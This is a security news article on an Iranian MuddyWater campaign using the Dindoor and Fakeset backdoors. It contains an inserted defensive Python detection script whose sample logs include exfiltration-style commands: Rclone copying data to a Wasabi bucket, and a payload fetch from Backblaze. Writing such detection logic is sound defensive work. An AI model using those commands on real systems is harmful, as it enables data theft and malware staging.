Iran-Linked MuddyWater Hackers Embed New Dindoor Backdoor in U.S. Networks
New research from Broadcom’s Symantec and Carbon Black Threat Hunter Team has revealed that an Iranian hacking group has infiltrated the networks of several U.S. companies, including banks, airports, non-profits, and the Israeli division of a software firm. This activity has been linked to the state-sponsored group known as MuddyWater (also referred to as Seedworm), which is associated with the Iranian Ministry of Intelligence and Security (MOIS). The campaign reportedly began in early February, with heightened activity noted following recent U.S. and Israeli military strikes on Iran.
Targeted Organizations and Backdoor Discovery
The software company targeted in this campaign serves various sectors, including defense and aerospace, with its Israeli operations appearing to be the primary focus. The attacks have led to the introduction of a previously unknown backdoor called Dindoor, which utilizes the Deno JavaScript runtime for execution. Broadcom has also reported an attempt to exfiltrate data from the software company using the Rclone utility directed toward a Wasabi cloud storage bucket, although it remains unclear if this effort was successful.
In addition to the software company, a U.S. bank and a Canadian non-profit were also targeted. Investigations revealed a separate Python backdoor named Fakeset within the networks of a U.S. airport and the non-profit organization. This backdoor was downloaded from servers belonging to Backblaze, a U.S.-based cloud storage provider. The digital certificate used to sign Fakeset has also been linked to other malware, including Stagecomp and Darkcomp, both previously associated with MuddyWater.
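As an added illustration of how a defender might hunt for the observables named above (Rclone pushing data toward a Wasabi endpoint, the Deno runtime executing a script from a user-writable path, and a process fetching from Backblaze storage), the following detection logic is example code written here, not from the Symantec/Carbon Black report. The log format, hostnames, file paths and URLs are constructed assumptions.

```python
from dataclasses import dataclass
from typing import Optional

# Cloud-storage providers the report associates with staging and exfiltration
# (Wasabi, Backblaze); the domain strings are the providers' real API hosts.
STORAGE_ENDPOINTS = ("wasabisys.com", "backblazeb2.com")
# User-writable locations where a Deno-based implant would plausibly be dropped.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed process-creation records in an assumed "ts|host|image|cmdline"
# format; none of these lines are real telemetry.
SAMPLE_EVENTS = [
    "2026-02-03T10:12:01Z|ws-14|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "2026-02-03T10:15:44Z|ws-14|C:\\Users\\Public\\rclone.exe|rclone.exe copy C:\\Share remote:bucket --s3-endpoint s3.wasabisys.com",
    "2026-02-03T10:16:02Z|ws-22|C:\\Users\\jdoe\\AppData\\Local\\deno.exe|deno.exe run -A C:\\Users\\jdoe\\AppData\\Local\\Temp\\upd.js",
    "2026-02-03T10:17:30Z|srv-01|C:\\Python311\\python.exe|python.exe dl.py https://f000.backblazeb2.com/file/example-bucket/payload.py",
    "2026-02-03T10:18:00Z|ws-30|C:\\Program Files\\deno\\deno.exe|deno.exe run C:\\Program Files\\app\\server.ts",
]

@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    cmdline: str

def classify(image: str, cmdline: str) -> Optional[str]:
    """Return a rule name for a suspicious process launch, or None if benign."""
    name = image.rsplit("\\", 1)[-1].lower()
    low = cmdline.lower()
    if name == "rclone.exe" and any(e in low for e in STORAGE_ENDPOINTS):
        return "RCLONE_TO_CLOUD_STORAGE"      # Rclone pointed at Wasabi/Backblaze
    if name == "deno.exe" and any(d in low for d in USER_WRITABLE):
        return "DENO_SCRIPT_IN_USER_DIR"      # Deno executing from a user-writable path
    if any(e in low for e in STORAGE_ENDPOINTS):
        return "STORAGE_ENDPOINT_REFERENCE"   # any other process reaching those providers
    return None

def scan(lines):
    """Parse each record and collect findings in log order."""
    findings = []
    for line in lines:
        ts, host, image, cmdline = line.split("|", 3)
        rule = classify(image, cmdline)
        if rule:
            findings.append(Finding(ts, host, rule, cmdline))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.ts, f.host, f.rule, "->", f.cmdline)
```

In practice the same three rules would be expressed in the EDR or SIEM query language and tuned against a baseline of legitimate Rclone and Deno use in the environment.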
Evolving Threat Landscape
The findings highlight the increasing sophistication of Iranian threat actors, who have refined their tools and malware capabilities. Reports indicate that these actors have also demonstrated advanced social engineering techniques, including spear-phishing campaigns and “honeytrap” operations designed to cultivate relationships with targets to gain access to sensitive information.
This surge in cyber activity coincides with escalating military tensions in the region, which have prompted a parallel wave of attacks in the digital domain. Recent research from Check Point has identified the pro-Palestinian hacktivist group Handala Hack (also known as Void Manticore) conducting operations through Starlink IP ranges to exploit vulnerabilities in externally facing applications.
Broader Cyber Threats from Iran
In recent months, various Iranian-affiliated adversaries, including Agrius (also known as Agonizing Serpens, Marshtreader, and Pink Sandstorm), have been observed scanning for vulnerabilities in Hikvision cameras and video intercom systems. These efforts exploit known security flaws such as CVE-2017-7921 and CVE-2023-6895. The targeting of IP cameras has intensified in the wake of ongoing conflicts, particularly in Israel and Gulf nations, including the UAE, Qatar, Bahrain, and Kuwait.
Check Point’s analysis indicates that Iranian cyber operations may leverage compromised cameras for operational support and battle damage assessment related to missile operations. Tracking such activities could serve as an early warning for potential kinetic actions.
The ongoing conflict has prompted advisories from the Canadian Centre for Cyber Security (CCCS), warning that Iran is likely to utilize its cyber capabilities to conduct retaliatory attacks against critical infrastructure and information operations to further its strategic interests.
Recent Developments in Cyber Operations
Several significant developments have emerged in the context of Iranian cyber activities:
- Israeli intelligence agencies reportedly infiltrated Tehran’s traffic camera network to monitor the movements of key Iranian officials, including bodyguards of Ayatollah Ali Khamenei.
- The Islamic Revolutionary Guard Corps (IRGC) has targeted Amazon’s data center in Bahrain, citing the company’s support for “enemy military and intelligence activities.”
- Active wiper campaigns are reportedly underway against Israeli sectors, including energy, finance, government, and utilities. Iran’s arsenal includes over 15 families of wiper malware, such as ZeroCleare and Meteor.
- State-sponsored groups like MuddyWater, Charming Kitten, OilRig, Elfin, and Fox Kitten have shown signs of activation and rapid retooling, preparing for retaliatory operations amid the escalating conflict.
- A large-scale cyber campaign, dubbed #OpIsrael, has been launched by pro-Russian and pro-Iranian actors targeting Israeli industrial control systems and government portals across Kuwait, Jordan, and Bahrain.
Recommendations for Organizations
Organizations are advised to enhance their cybersecurity measures in light of these developments. Recommendations include strengthening monitoring capabilities, limiting internet exposure, disabling remote access to operational technology systems, enforcing phishing-resistant multi-factor authentication, implementing network segmentation, and ensuring that all internet-facing applications and devices are kept up to date.
As the conflict continues, organizations should remain vigilant for potential cyber responses that may escalate beyond hacktivism into destructive operations.
For further details, see the full report on the evolving cyber threat landscape. As reported by thehackernews.com.